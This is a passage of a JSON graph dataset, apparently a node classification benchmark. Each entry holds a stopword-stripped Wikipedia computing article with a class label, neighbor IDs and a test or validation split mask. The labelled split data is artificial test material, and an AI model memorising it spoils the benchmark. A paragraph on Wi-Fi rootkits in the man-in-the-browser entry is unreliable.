taken together probably reveal information secret key typically multiple pairs iv chosen differences generated key-streams analysed statistically linear correlation and/or algebraic boolean relation see also differential cryptanalysis choosing particular values initialization vector expose non-random pattern generated sequence attack computes bits thus shortens effective key length symptom attack would frequent re-synchronisation modern stream ciphers include steps adequately mix secret key initialization vector usually performing many initial rounds",
    "neighbors": [
      8674,
      4163,
      4456,
      11241,
      3084,
      2957,
      4975,
      2961,
      9170,
      11185,
      2357,
      1941,
      8694,
      10329,
      10332,
      9373,
      4863
    ],
    "mask": "None"
  },
  {
    "node_id": 263,
    "label": 9,
    "text": "Undefined_variable:undefined variable undefined variable source code computer program variable accessed code previously declared code programming languages implicit declaration provided first time variable encountered compile time languages usage considered sufficiently serious diagnostic issued compilation fails language definitions initially used implicit declaration behavior matured provided option disable e.g perl codice_1 visual basic codice_2 following provides examples various programming language implementations respond undefined variables code snippet followed error message *** eval variable x value foo.c function main error x defined nil stdin:1.9 error unbound variable constructor x set y=x unbound value x error error +++ error 30 line 2 label found error",
    "neighbors": [
      8258,
      11683,
      7076,
      8644,
      3462,
      8582,
      4777,
      8554,
      10013,
      847,
      9245,
      692,
      2045,
      1343
    ],
    "mask": "None"
  },
  {
    "node_id": 264,
    "label": 0,
    "text": "Factored_language_model:factored language model factored language model flm extension conventional language model introduced jeff bilmes katrin kirchoff 2003 flm word viewed vector k factors formula_1 flm provides probabilistic model formula_2 prediction factor formula_3 based formula_4 parents formula_5 example formula_6 represents word token formula_7 represents part speech tag english expression formula_8 gives model predicting current word token based traditional ngram model well part speech tag previous word major advantage factored language models allow users specify linguistic knowledge relationship word tokens part speech english morphological information stems root etc arabic like n-gram models smoothing techniques necessary parameter estimation particular generalized back-off used training flm",
    "neighbors": [
      1044,
      3998
    ],
    "mask": "None"
  },
  {
    "node_id": 265,
    "label": 7,
    "text": "Perspecsys:perspecsys perspecsys inc. cloud computing security company provides cloud data protection software perspecsys offices toronto area tysons corner virginia san francisco california london england paris france berlin germany perspecsys specializes cloud data privacy data residency/sovereignty data security software enables compliance industry regulations directives security requirements adopting cloud banking financial services healthcare retail government entities must adhere strict guidelines handling sensitive personal data cloud applications include pci dss itar ferpa hipaa hitech appprotex cloud data protection gateway secures data software service platform service provider applications use encryption tokenization gartner refers type technology cloud encryption gateway categorizes providers technology cloud access security brokers united states patent trademark office uspto granted perspecsys u.s. patent 9,021,135 system method tokenization data storage cloud main component cloud encryption gateway appprotex cloud data protection gateway server acts intercepting software proxy gateway server provides core data privacy residency security services gateway appprotex discovery analyze capabilities allow visibility information users sharing cloud applications users may define encryption tokenization options field-level cloud data protection gateway allows encryption third-party jca/jce-compliant cryptographic module including fips 140-2 federal information processing standard validated modules cloud data secured end-users maintain full functionality ability search sort e-mail using data either encrypted tokenized data flows cloud application end user interpreted gateway cloud applications feature email appprotex communications server enable secure transfer email additionally appprotex server facilitates deployment cloud security gateway via iaas partners amazon web services csc fujitsu perspecsys salesforce appexchange partner provides tokenization encryption salesforce.com chatter force.com wave analytics cloud data appprotex cloud data protection gateway secures cloud data across cloud applications including oracle crm demand oracle fusion crm servicenow successfactors appextremes xactly incent perspecsys cloud encryption gateway uses either tokenization encryption cloud security tokenization option evaluated coalfire pci dss qualified security assessor qsa fedramp-accredited third party assessment organization 3pao ensure adheres industry guidelines gateway also allows encryption modules third-party providers mcafee voltage security safenet symantec encrypt cloud data including modules fips 140-2 federal information processing standard validated issued national institute standards technology nist may 2013 perspecsys secured 12 million series b funding co-led paladin capital group ascent venture partners joined return backer intel capital existing institutional investors together series funding new round financing brings total investment perspecsys 20 million perspecsys ’ series round funding totaled 8 million led intel capital global investment branch technology company intel may 2011 growthworks mars investment accelerator fund also invested perspecsys july 30 2015 blue coat systems announced acquired perspecsys order expand cloud security offerings acquisition price estimated 180–200m subsequently 12th june 2016 symantec corporation announced would acquiring blue coat systems approximately 4.65 billion cash greg clark chief executive officer blue coat appointed chief executive officer symantec",
    "neighbors": [
      704,
      3520,
      9569,
      420,
      4388,
      10090,
      3629,
      7248,
      9137,
      467,
      4725
    ],
    "mask": "None"
  },
  {
    "node_id": 266,
    "label": 4,
    "text": "William_P._Crowell:william p. crowell william perry crowell born november 26 1940 deputy director national security agency february 1994 september 1997 time highest ranking civilian agency oversaw management crowell joined agency recruiter nsa 1962 crowell also deputy director operations agency october 1991 february 1994 also served many boards president private sector intelligence security companies including ceo cylink corporation director broadware technologies prominex arcsight inc. narus safenet inc. drs technologies inc. airpatrol well sunfed board directors retired nsa september 12 1997",
    "neighbors": [
      289,
      4898,
      7137,
      10305,
      11302,
      327,
      6668,
      365,
      9357,
      4719,
      7887,
      2897,
      1714,
      2162,
      10832,
      4566,
      2712,
      6749
    ],
    "mask": "None"
  },
  {
    "node_id": 267,
    "label": 9,
    "text": "Structured_Audio_Orchestra_Language:structured audio orchestra language structured audio orchestra language saol imperative music-n programming language designed describing virtual instruments processing digital audio applying sound effects published subpart 5 mpeg-4 part 3 iso/iec 14496-3:1999 1999 part mpeg-4 international standard saol one key components mpeg-4 structured audio toolset along",
    "neighbors": [
      9345,
      9210,
      8262,
      6810,
      7550
    ],
    "mask": "Test"
  },
  {
    "node_id": 268,
    "label": 4,
    "text": "Alex_Stamos:alex stamos alex stamos computer scientist adjunct professor stanford university center international security cooperation former chief security officer cso facebook planned departure company following disagreement executives address russian government use platform spread disinformation 2016 u.s. presidential election reported march 2018 stamos grew fair oaks california graduated bella vista high school 1997 stamos attended university california berkeley graduated 2001 degree eecs stamos began career loudcloud later security consultant stake 2004 stamos co-founded isec partners security consulting firm joel wallenstrom himanshu dwivedi jesse burns scott stender time isec partners stamos well known research publications vulnerabilities forensics software macos operation aurora security ethics post-snowden era stamos expert witness number cases involving digital privacy encryption free speech isec partners acquired ncc group 2010 following acquisition isec partners ncc group stamos became cto artemis internet internal startup ncc group artemis internet petitioned icann host '.secure gtld services would required meet minimum security standards artemis ultimately acquired right operate '.trust gtld deutsche post launch services stamos filed received five patents work artemis internet 2014 stamos joined yahoo cso yahoo testified congress online advertising impact computer security data privacy publicly challenged nsa director michael s. rogers subject encryption backdoors february 2015 cybersecurity conference hosted new america resigned june 2015 response then-undisclosed program scan incoming email behalf united states government intelligence agencies 2015 stamos joined facebook cso time facebook stamos co-authored paper jen weedon nuland use social media attack elections later delivered keynote address black hat briefings 2017 need broaden definition security diversify cybersecurity industry following disagreement executives address russian government use platform spread disinformation 2016 u.s. presidential election made plans 2018 leave company take research professorship stanford university stanford university center international security cooperation lists stamos adjunct professor visiting scholar hoover institution director stanford internet observatory",
    "neighbors": [
      2275,
      5284,
      1189,
      5512,
      11659,
      9518,
      7887,
      10448
    ],
    "mask": "None"
  },
  {
    "node_id": 269,
    "label": 9,
    "text": "Michael_Witbrock:michael witbrock michael john witbrock computer scientist field artificial intelligence witbrock native new zealand former vice president research cycorp carrying cyc project effort produce genuine artificial intelligence dr. witbrock born christchurch new zealand ph.d. computer science carnegie mellon university joining cycorp principal scientist terra lycos working integrating statistical knowledge-based approaches understanding web user behavior also associated systems pittsburgh research center informedia digital library carnegie mellon dr. witbrock dissertation work speaker modeling going cycorp published broad range areas including work cycorp focused improving knowledge formation efforts particularly dialogue processing improving accessibility cyc project together john mount witbrock credited original idea computer-generated art",
    "neighbors": [
      5611,
      2062,
      1783
    ],
    "mask": "Test"
  },
  {
    "node_id": 270,
    "label": 1,
    "text": "Adaptive_Server_Enterprise:adaptive server enterprise sap ase adaptive server enterprise originally known sybase sql server also commonly known sybase db sybase ase relational model database server developed sybase corporation later became part sap ag ase predominantly used unix platform also available microsoft windows 1988 sybase microsoft ashton-tate began development version sql server os/2 ashton-tate later left group microsoft went port system windows nt agreement expired 1993 microsoft purchased license source code began sell product microsoft sql server ms sql server sybase sql server share many features syntax peculiarities day originally unix platforms 1987 sybase corporation primary relational database management system product initially marketed name sybase sql server 1988 sql server os/2 co-developed pc sybase microsoft ashton-tate ashton-tate divested interest microsoft became lead partner porting sql server windows nt microsoft sybase sold supported product version 4.2.1 sybase released sql server 4.2 1992 release included internationalization localization support symmetric multiprocessing systems 1993 co-development licensing agreement microsoft sybase ended companies parted ways continuing develop respective versions sql server sybase released sybase sql server 10.0 part system 10 product family also included back-up server open client/server apis sql monitor sa companion omnisql gateway microsoft continued microsoft sql server sybase provides native low-level programming interfaces database server uses protocol called tabular data stream prior version 10 dblib database library used version 10 onwards uses ctlib client library 1995 sybase released sql server 11.0 starting version 11.5 released 1996 sybase moved differentiate product microsoft sql server renaming adaptive server enterprise sybase 11.5 added asynchronous prefetch case expression sql optimizer use descending index avoid need worktable sort logical process manager added allow prioritization assigning execution attributes engine affinity 1998 ase 11.9.2 rolled support data pages locking data rows row-level locking distributed joins improved smp performance indexes could created descending order column readpast concurrency option repeatable read transaction isolation added lock timeout option task-to-engine affinity added query optimization delayed cursor opened values variables known 1999 ase 12.0 released providing support java high availability distributed transaction management merge joins added previous joins nested loop joins additional cache partitions added improve performance 2001 ase 12.5 released providing features dynamic memory allocation ejb container support xml ssl ldap also added compressed backups unichar utf-16 support multiple logical page sizes 2k 4k 8k 16k 2005 sybase released ase 15.0 included support partitioning table rows database across individual disk devices virtual columns computed required ase 15.0 many parameters static required server reboot changes take place made dynamic changes take effect immediately improved performance reduced downtime example one parameter made dynamic tape retention days number days backup kept tape media without overwriting existing contents production environment january 27 2010 sybase released ase 15.5 included support in-memory relaxed-durability databases distributed transaction management shared-disk cluster faster compression backups well backup server support ibm® tivoli® storage manager deferred name resolution user-defined stored procedures fips 140-2 login password encryption incremental data transfer bigdatetime bigtime datatypes tempdb groups also added july 2010 sybase became wholly owned subsidiary sap america september 13 2011 sybase released ase 15.7 techwave included support new security features application functionality configuration groups new threaded kernel compression large object lob regular data end-to-end cis kerberos authentication dual control encryption keys unattended startup extension securing logins roles password management login profiles alter ... modify owner external passwords hidden text abstract plans cached statements shrink log space in-row off-row lob using large object text unitext image datatypes stored procedures using lob locators transact-sql statements select update exclusively lock rows subsequent updates within transaction update-able cursors non-materialized non-null columns default value fully recoverable ddl select alter table commands require data movement reorg rebuild merge command expanded variable-length rows allowing unicode noncharacters april 2014 sap released ase 16 included support partition locking cis support hana relaxed query limits query plan optimization star joins dynamic thread assignment sort hash join operator improvements full-text auditing auditing authorization checks inside stored procedures create replace functionality query plan execution statistics html index compression full database encryption locking run-time locking metadata latch enhancements multiple trigger support residual data removal configuration history tracking crc checks dump database ability calculate transaction log growth rate specified time period single standalone installation ase typically comprises one dataserver one corresponding backup server multi server installation many dataservers share one backup server dataserver consists system databases user databases minimum system databases mandatory normal working dataserver 'master 'tempdb 'model 'sybsystemdb 'sybsystemprocs 'master database holds critical system related information includes logins passwords dataserver configuration parameters 'tempdb used storage data required intermediate processing queries temporary data 'model used template creating new databases 'sybsystemprocs consists system supplied stored procedures queries system tables manipulates data ase single process multithreaded dataserver application sap also developer edition used free develop production use allows 1 engine 25 connections express edition limited 1 server engine 2 gb memory 5 gb disk space per server edition free production purposes",
    "neighbors": [
      11136,
      9348,
      1037,
      270,
      6797,
      8976,
      9360,
      9234,
      10511,
      10389,
      10518,
      11030,
      1816,
      5403,
      4135,
      1964,
      5677,
      10286,
      9397,
      5691,
      9286,
      3784,
      8781,
      2520,
      5210,
      479,
      1383,
      5492,
      7412,
      10236,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 271,
    "label": 3,
    "text": "IBM_ThinkPad_ThinkLight:ibm thinkpad thinklight thinklight keyboard light present thinkpad families notebook computers series originally designed ibm developed produced lenovo since 2005 white yellow led depending model located top edge display illuminating keyboard allow use low-light conditions activated key combination fn-pgup bottom left top right keys keyboard newer thinkpads use combination fn-space instead sometimes shortcut also used conjunction control backlit keyboard laptop on-screen display thinkpad computers display light light indicator thinklight activated monitor pc thinkpads like z r series though r61 r32 models still white light feature amber yellow led due lower cost models like series use white led generally preferred g series sl series omit thinklight hp elitebook series notebooks contain similar keyboard light called hp night light unlike thinklight activated physical button next night light rather keyboard shortcut dell latitude atg series laptops also contained pair red leds controlled similar way ibm thinklight also serve illuminate keyboard computer manufacturers opted backlit keyboards instead illuminating keyboard notebooks feature include dell studio latitude series hp elitebooks hp envy models apple macbook pro macbook air recent thinkpads included thinklight illuminated keyboard recent models longer include thinklight",
    "neighbors": [
      4259,
      5606,
      3304,
      5481,
      2165,
      1400,
      3323
    ],
    "mask": "Validation"
  },
  {
    "node_id": 272,
    "label": 7,
    "text": "Virtustream:virtustream virtustream provider cloud computing management software infrastructure service iaas managed services enterprises governments service providers subsidiary dell technologies virtustream headquartered mclean va offices atlanta bangalore dallas frankfurt kaunas london mclean san francisco santa fe sydney tokyo washington d.c. virtustream global infrastructure includes data centers located frankfurt japan london paris san francisco seoul sydney las vegas washington d.c. chicago virginia virtustream founded 2009 company raised approximately 40 million series funding columbia capital blue lagoon capital intel capital noro-moseley partners tdf ventures september 2009 may 2010 15 million series b funding july 2011 intel capital columbia capital noro-moseley partners questmark capital tdf ventures may 26 2015 emc announced agreement acquire virtustream completed acquisition virtustream july 9 2015 following virtustream ’ acquisition emc october 12 2015 dell inc. announced would acquire emc cash-and-stock deal valued 67 billion—the largest-ever acquisition technology industry merger closed september 7 2016 emc renamed dell emc result eventually renamed dell technologies dell technologies became world ’ largest privately controlled tech company time october 12 2015 fortune reported “ overall deal values emc around 27 higher trading news dell ’ interest first broke last week would second-largest tech merger ever behind 106 billion tie-up aol time warner 2000 largest-ever take-private transaction tech company. ” may 7 2018 announced virtustream founders rodney j. rogers kevin reid decided leave company rory read became president virtustream retaining position chief operating executive dell technologies deepak patil formerly microsoft azure became senior vice president product technology",
    "neighbors": [
      4236,
      10893,
      911,
      1935,
      4623,
      8592,
      2965,
      2328,
      4377,
      8986,
      6307,
      9766,
      5159,
      6444,
      8495,
      3121,
      7352,
      2496,
      4289,
      1224,
      8520,
      4429,
      7248,
      1362,
      467,
      9682,
      6367,
      4194,
      11646,
      5732,
      10090,
      3819,
      7660,
      10615,
      2170,
      5499,
      253,
      8446
    ],
    "mask": "Validation"
  },
  {
    "node_id": 273,
    "label": 2,
    "text": "TOPS-20:tops-20 tops-20 operating system digital equipment corporation dec proprietary os used dec 36-bit mainframe computers hardware reference manual described decsystem-10/decsystem-20 processor meaning dec pdp-10 decsystem-20 tops-20 began 1969 tenex operating system bolt beranek newman bbn shipped product dec starting 1976 tops-20 almost entirely unrelated similarly named tops-10 shipped pa1050 tops-10 monitor calls emulation facility allowed tops-10 executables run unchanged matter policy dec update pa1050 support later tops-10 additions except required dec software tops-20 competed tops-10 waits—all available pdp-10 notable time-sharing systems timeframe tops-20 based upon tenex operating system created bbn technologies digital pdp-10 computer digital started development ki-10 version pdp-10 issue arose point tenex popular customer-written pdp-10 operating systems would run new faster ki-10s correct problem dec pdp-10 sales manager purchased rights tenex bbn set project port new machine end little original tenex code remained digital ultimately named resulting operating system tops-20 came tops-20 merely emulation tops-10 operating system calls known uuo standing unimplemented user operation needed compilers 20-specific run well user-programs written languages package mapped user address space named pa1050 pa pat compatibility 10 dec pdp 10 50 pdp 10 model 50 10/50 1050 sometimes pa1050 referred pat name good fit fact pa1050 simply unprivileged user-mode code performed requested action using jsys calls necessary major ways get tops-20 capabilities made tops-20 important exec accomplished work primarily using rather advanced day tops-20-specific features one could type find operands permitted/required following list commands supported tops-20 command processor jsys stands jump system operands times memory addresses tops-20 allows use 18-bit 30-bit addresses monitor calls require one kind calls accept either kind monitor calls use 18 bits hold address calls interpret 18-bit addresses locations current section internally files first identified using gtjfn get job file number jsys jfn number used open openf manipulate file contents paul allen maintained several publicly accessible historic computer systems death including xkl toad-2 running tops-20 request account try running tops-20 hardware emulated pdp-10",
    "neighbors": [
      2560,
      6155,
      6675,
      7187,
      10776,
      25,
      8729,
      4637,
      9759,
      9762,
      4643,
      6180,
      5158,
      557,
      7728,
      7217,
      10803,
      9784,
      10809,
      576,
      577,
      2625,
      3650,
      8262,
      6221,
      3160,
      10333,
      97,
      11363,
      6760,
      10856,
      8298,
      9835,
      7285,
      4727,
      2168,
      9335,
      634,
      1147,
      3197,
      1150,
      5247,
      11390,
      2179,
      10883,
      10891,
      6797,
      10382,
      3216,
      9366,
      6296,
      2201,
      9370,
      9882,
      7325,
      9887,
      8876,
      8879,
      3248,
      178,
      9907,
      6837,
      6329,
      8889,
      5823,
      8388,
      1736,
      2248,
      9932,
      5840,
      8402,
      1750,
      7382,
      8410,
      9436,
      1247,
      11489,
      1253,
      7403,
      10475,
      5361,
      242,
      5363,
      9466,
      2811,
      9468,
      1278,
      10499,
      2314,
      1804,
      8977,
      787,
      11539,
      789,
      5397,
      8474,
      10016,
      3873,
      292,
      10235,
      2345,
      7983,
      6448,
      11568,
      2355,
      10547,
      7477,
      823,
      4409,
      5435,
      6459,
      7483,
      7999,
      11075,
      4423,
      5452,
      6988,
      5457,
      11601,
      7507,
      7511,
      10590,
      3426,
      8551,
      5484,
      7020,
      11635,
      5492,
      2933,
      376,
      8573,
      7039,
      8063,
      6529,
      10113,
      8069,
      394,
      3978,
      4492,
      7057,
      11667,
      11675,
      8092,
      2462,
      5022,
      7076,
      421,
      1445,
      935,
      4521,
      9643,
      4525,
      11184,
      7601,
      10676,
      6075,
      6078,
      9151,
      11204,
      11205,
      4040,
      8136,
      2507,
      9166,
      477,
      10730,
      10731,
      4589,
      8687,
      3056,
      5105,
      6128,
      3571,
      5619,
      11256,
      5115
    ],
    "mask": "Test"
  },
  {
    "node_id": 274,
    "label": 2,
    "text": "Busdma:busdma computing busdma bus_dma bus_space set application programming interfaces designed help make device drivers less dependent platform-specific code thereby allowing host operating system easily ported new computer hardware accomplished abstractions direct memory access dma mapping across popular machine-independent computer buses like pci used distinct architectures ia-32 netbsd/i386 dec alpha netbsd/alpha additionally devices may come multiple flavours supporting one bus e.g. isa eisa vesa local bus pci still sharing core logic irrespective bus device drivers would also benefit abstraction thus rationale busdma facilitate maximum code reuse across wide range platforms circa 2006 bus dma abstractions made possible netbsd support 50 hardware platforms 14 cpu architectures single source tree compared forking model used linux ports originally implemented bus_dma apis developers netbsd operating system busdma adopted openbsd freebsd derivatives freebsd incorporating busdma umbrella without underscore netbsd openbsd additional bus_space apis amalgamated version busdma incorporated freebsd dragonfly bsd developers also slowly converting drivers use busdma",
    "neighbors": [
      9223,
      10761,
      7702,
      4636,
      9762,
      6702,
      1071,
      9784,
      5177,
      3142,
      8266,
      8778,
      5710,
      7249,
      9306,
      607,
      1637,
      5230,
      8816,
      9844,
      9343,
      2180,
      2193,
      2212,
      684,
      3248,
      1718,
      5819,
      11459,
      2245,
      9927,
      8395,
      8909,
      6864,
      7383,
      10455,
      6361,
      8410,
      7907,
      11506,
      5368,
      1273,
      1785,
      8954,
      7425,
      5380,
      1286,
      1801,
      2825,
      10000,
      6438,
      8998,
      10535,
      4908,
      7983,
      9520,
      9009,
      11573,
      823,
      3404,
      11086,
      1361,
      850,
      5970,
      6491,
      7521,
      8546,
      1891,
      11627,
      2415,
      7027,
      5492,
      2421,
      3445,
      2424,
      10105,
      1927,
      10631,
      3465,
      1932,
      9625,
      1946,
      11698,
      1465,
      3006,
      3013,
      9671,
      1993,
      4571,
      5084,
      3551,
      7139,
      998,
      4071,
      4073,
      2545,
      3058,
      9201
    ],
    "mask": "Test"
  },
  {
    "node_id": 275,
    "label": 5,
    "text": "Hybrid_Access_Networks:hybrid access networks hybrid access networks refer special architecture broadband access networks two different network technologies combined improve bandwidth frequent motivation hybrid access networks combine one xdsl network wireless network lte technology generic applied combine different types access networks docsis wimax 5g satellite networks broadband forum specified architecture deployment networks one main motivations hybrid access networks provide faster internet services rural areas always cost effective deploy faster xdsl technologies g.fast vdsl2 cover long distances street cabinet home several governments notably europe require network operators provide fast internet services inhabitants minimum 30 mbps 2020 second use case improve reliability access link given unlikely xdsl network wireless network fail time third motivation fast service turnup customer immediately install hybrid network access use wireless leg network operator installing wired part several techniques defined broadband forum create hybrid access networks illustrate assume enduser hybrid cpe router attached wired access network xdsl wireless lte deployments possible e.g enduser might two different access routers linked together cable instead single hybrid cpe router first deployment scenario network operator provides hybrid cpe router subscriber specialised equipment operator network two possible configurations ip addresses first deployment scenario allocate different ip addresses wired wireless interfaces case hybrid cpe router needs load-balance intelligently packets two networks particular must ensure packets belonging given tcp connection sent interface second deployment scenario allocate ip address wired wireless networks configure routing networks ensure packets correctly routed second deployment scenario network operator provides hybrid cpe router subscriber installs hybrid aggregation gateway inside access networks hybrid aggregation gateway plays important role balancing packets sent destined hybrid cpe router two access networks two technologies defined deployed enable hybrid cpe routers interact hybrid aggregation gateways main objective technologies efficiently use two access links even different delay bandwidth one technical difficulty occurs distributing packets heterogeneous links accurately detect congestion notably wireless network whose bandwidth vary quickly cope reordering caused delay difference one approach uses gre tunnels hide two links upper layer protocol hybrid cpe hag need reorder received packets ensure tcp receives in-sequence packets second approach uses multipath tcp recent tcp extension designed precisely enable transmission packets belong single connection different links precisely multipath tcp proxies installed hybrid cpe router hybrid aggregation gateway client behind hybrid cpe router initiates tcp connection connection automatically converted multipath tcp connection proxied hybrid aggregation gateway forwarded final server approach leverages ability multipath tcp efficiently handle congestion cope reordering heterogeneous access links two approaches defined interactions hybrid cpe router hybrid aggregation gateway transparent mode used hybrid aggregation gateway placed path packets sent hybrid cpe router otherwise hybrid aggregation gateway includes tcp converter defined additional details hybrid access networks deployment described first commercial deployments started 2015 several deployments hybrid access networks already documented",
    "neighbors": [
      361,
      10924,
      6318
    ],
    "mask": "None"
  },
  {
    "node_id": 276,
    "label": 2,
    "text": "Sintran:sintran sintran range operating systems norsk data line minicomputers original version sintran released 1968 developed department engineering cybernetics norwegian institute technology cooperation affiliated research institute sintef os name portmanteau sin tef tran fortran implementation language norsk data took part development sintran ii multi-user system constituted software platform nord-1 range terminal servers far common version os sintran iii developed solely norsk data launched 1974 real-time multitasking system used norsk data server machines nord-10 -100 remainder company lifetime i.e 1992",
    "neighbors": [
      2345,
      9162,
      7983,
      9366,
      3960,
      2399
    ],
    "mask": "Validation"
  },
  {
    "node_id": 277,
    "label": 7,
    "text": "Cloud_load_balancing:cloud load balancing cloud load balancing type load balancing performed cloud computing cloud load balancing process distributing workloads across multiple computing resources cloud load balancing reduces costs associated document management systems maximizes availability resources type load balancing confused domain name system dns load balancing dns load balancing uses software hardware perform function cloud load balancing uses services offered various computer network companies cloud load balancing advantage dns load balancing transfer loads servers globally opposed distributing across local servers event local server outage cloud load balancing delivers users closest regional server without interruption user cloud load balancing addresses issues relating ttl reliancy present dns load balancing dns directives enforced every ttl cycle take several hours switching servers lag server failure incoming server traffic continue route original server ttl expires create uneven performance different internet service providers may reach new server internet service providers another advantage cloud load balancing improves response time routing remote sessions best performing data centers cloud computing brings advantages cost flexibility availability service users advantages drive demand cloud services demand raises technical issues service oriented architectures internet services ios -style applications high availability scalability major concern issues load balancing allows cloud computing scale increasing demands efficiently allocating dynamic local workload evenly across nodes opportunistic load balancing olb algorithm assigns workloads nodes free order simple consider expected execution time node workload client aware policy wcap implemented dis-centralized manner low overhead specifies unique special property usp requests computing nodes information usp schedule decide suitable node complete request wcap makes computing nodes reducing idle time also reduces performance time searches based content information biased random sampling bases job allocation network represented directed graph execution node graph in-degree means available resources out-degree means allocated jobs in-degree decrease job execution out-degree increase job allocation active clustering self-aggregation algorithm rewire network experiment result active clustering random sampling walk predictably perform better number processing nodes increased honeyhive algorithm show increasing pattern load balancer forwards packets web servers according different workloads servers however hard implement scalable load balancer cloud commodity business model limited infrastructure control allowed cloud providers client-side load balancer clb solve problem using scalable cloud storage service.clb allows clients choose back-end web servers dynamic content although delivers static content",
    "neighbors": [
      4194,
      9238,
      7298
    ],
    "mask": "Test"
  },
  {
    "node_id": 278,
    "label": 4,
    "text": "Man-in-the-browser:man-in-the-browser man-in-the-browser mitb mitb mib mib form internet threat related man-in-the-middle mitm proxy trojan horse infects web browser taking advantage vulnerabilities browser security modify web pages modify transaction content insert additional transactions completely covert fashion invisible user host web application mitb attack successful irrespective whether security mechanisms ssl/pki and/or two three-factor authentication solutions place mitb attack may countered using out-of-band transaction verification although sms verification defeated man-in-the-mobile mitmo malware infection mobile phone trojans may detected removed antivirus software 23 success rate zeus 2009 still low rates 2011 2011 report concluded additional measures top antivirus needed related simpler attack boy-in-the-browser bitb bitb majority financial service professionals survey considered mitb greatest threat online banking mitb threat demonstrated augusto paes de barros 2005 presentation backdoor trends future backdoors worst worlds name man-in-the-browser coined philipp gühring 27 january 2007 mitb trojan works using common facilities provided enhance browser capabilities browser helper objects feature limited internet explorer browser extensions user scripts example javascript etc antivirus software detect methods nutshell example exchange user host internet banking funds transfer customer always shown via confirmation screens exact payment information keyed browser bank however receive transaction materially altered instructions i.e different destination account number possibly amount use strong authentication tools simply creates increased level misplaced confidence part customer bank transaction secure authentication definition concerned validation identity credentials confused transaction verification examples mitb threats different operating systems web browsers known trojans may detected blocked removed antivirus software 2009 study effectiveness antivirus zeus 23 low success rates reported separate test 2011 2011 report concluded additional measures top antivirus needed theoretically effective method combating mitb attack out-of-band oob transaction verification process overcomes mitb trojan verifying transaction details received host bank user customer channel browser example automated telephone call sms dedicated mobile app graphical cryptogram oob transaction verification ideal mass market use since leverages devices already public domain e.g landline mobile phone etc requires additional hardware devices yet enables three-factor authentication using voice biometrics transaction signing non-repudiation level transaction verification downside oob transaction verification adds level end-user frustration slower steps mobile phone mobile trojan spyware man-in-the-mobile mitmo defeat oob sms transaction verification web fraud detection implemented bank automatically check anomalous behaviour patterns transactions keyloggers primitive form proxy trojans followed browser-session recorders capture data lastly mitbs sophisticated type ssl/pki etc may offer protection man-in-the-middle attack offers protection man-in-the-browser attack related attack simpler quicker malware authors set termed boy-in-the-browser bitb bitb malware used change client computer network routing perform classic man-in-the-middle attack routing changed malware may completely remove making detection difficult clickjacking tricks web browser user clicking something different user perceives means malicious code webpage phones tablets current use known vulnerability ddos wifi documented certain android phones vulnerability attacker detects someone using sharing possible target phone tablet directly using packet collision similar one found lan networks requiring guessing device sharing password using rainbow table cloning ssid thus forcing reboot enough data built ram causing buffer overflow narrow window malicious software used install rootkit malware diagnostics ota channel antivirus chance load similar way sideloading usb works appears defense present using sharing changing password short random interval eg wpa2-tkip devices support wpa3-otp may solution sufficiently large memory ends used eg 400gb",
    "neighbors": [
      3072,
      6657,
      10756,
      10245,
      9227,
      9233,
      9745,
      2579,
      9242,
      4637,
      9761,
      4648,
      9256,
      9770,
      9771,
      46,
      559,
      10801,
      5172,
      4661,
      3639,
      10297,
      3643,
      7739,
      9791,
      64,
      1088,
      4165,
      5707,
      10831,
      81,
      4689,
      10834,
      8789,
      6231,
      6747,
      612,
      1642,
      107,
      9834,
      115,
      9843,
      4728,
      10875,
      5245,
      1150,
      1664,
      6786,
      5764,
      3724,
      6797,
      9356,
      4245,
      10392,
      1690,
      10910,
      8351,
      2208,
      5281,
      2213,
      7340,
      7348,
      9908,
      11449,
      4797,
      8387,
      10952,
      11466,
      7885,
      4310,
      10457,
      4314,
      8923,
      3807,
      737,
      4326,
      10477,
      4344,
      3320,
      8443,
      5886,
      4863,
      1279,
      7943,
      7441,
      8978,
      3347,
      4883,
      2325,
      3867,
      7965,
      8998,
      2857,
      1834,
      300,
      7983,
      823,
      7996,
      11583,
      3395,
      10057,
      7515,
      8032,
      3941,
      11621,
      877,
      4462,
      8557,
      8054,
      9591,
      9087,
      6528,
      3971,
      7044,
      3462,
      8584,
      9102,
      7572,
      10141,
      9630,
      10657,
      5026,
      11175,
      939,
      1970,
      4023,
      6588,
      9664,
      9154,
      8133,
      2508,
      4048,
      5078,
      3032,
      988,
      10207,
      3552,
      9187,
      5605,
      487,
      8169,
      11244,
      494,
      1520,
      7152,
      2041,
      5114,
      3581
    ],
    "mask": "None"
  },
  {
    "node_id": 279,
    "label": 3,
    "text": "BMX_Simulator:bmx simulator bmx simulator racing video game released codemasters 1986 commodore 64 ported home computers followed two sequels bmx simulator 2 professional bmx simulator part series games included atv simulator grand prix simulator professional ski simulator bmx simulator overhead race game similar super sprint player must race another player computer around series seven different bicycle motocross bmx tracks also time limit beaten two cyclists compete race race viewed slow-motion action replay afterwards sinclair user called classy conversion commodore original full price game budget clothing zx computing said fun start finish rated monster hit",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 280,
    "label": 2,
    "text": "Android_lawn_statues:android lawn statues android lawn statues series large foam statues near googleplex google headquarters mountain view california currently located 1981 landings drive based code names versions google android mobile operating system named desserts sweet treats statues originally located front building 44 android development team offices moved present location blocks away next google visitor center beta area open google employees guests visitors encouraged take photos sculptures mostly made company named themendous google android fastest selling mobile operating system late 2010 developed partnership open handset alliance version 1.0 released september 23 2008 first publicly codenamed version android cupcake released april 27 2009 versions 1.0 1.1 codenames following scheme initially plan use famous robot names alphabetical order early interim revisions tagged astro boy bender eventually plan discontinued version 1.0 codename version 1.1 got internal codename petit four launched custom naming android releases desserts codenames became public version 1.5 started follow alphabetical order beginning c apparently since two previous public releases 'skipped scheme since releases android named desserts sweet treats names chosen alphabetical order although sometimes name applied multiple versions days named operating system unveiled google unveils lawn statue representing version codename statues lawn front building 44 android development team worked august 2014 august 2018 sixteen statues comprise collection created themendous exception oreo two statues one made located union city new jersey statues order installation green android joined early alex dog similar colour design actually toy chair puppy eero aarnio statue stolen 2009 similar incident happened 2012 due summer heat head jelly bean statue popped one jelly beans inside stolen prompted android engineer dan morrill post google+ jelly bean ridiculously hot jb statue overheated head partially melted popped think somebody stole one jelly beans people please n't steal jelly beans statue since repaired 2017 android oreo statue google ordered two different statues one featuring single oreo boxy design made themendous multiple oreos roundish shape",
    "neighbors": [
      4995,
      5892,
      5637,
      1670,
      7428,
      9610,
      2828,
      5262,
      8719,
      3600,
      10129,
      5522,
      1427,
      7700,
      10645,
      10009,
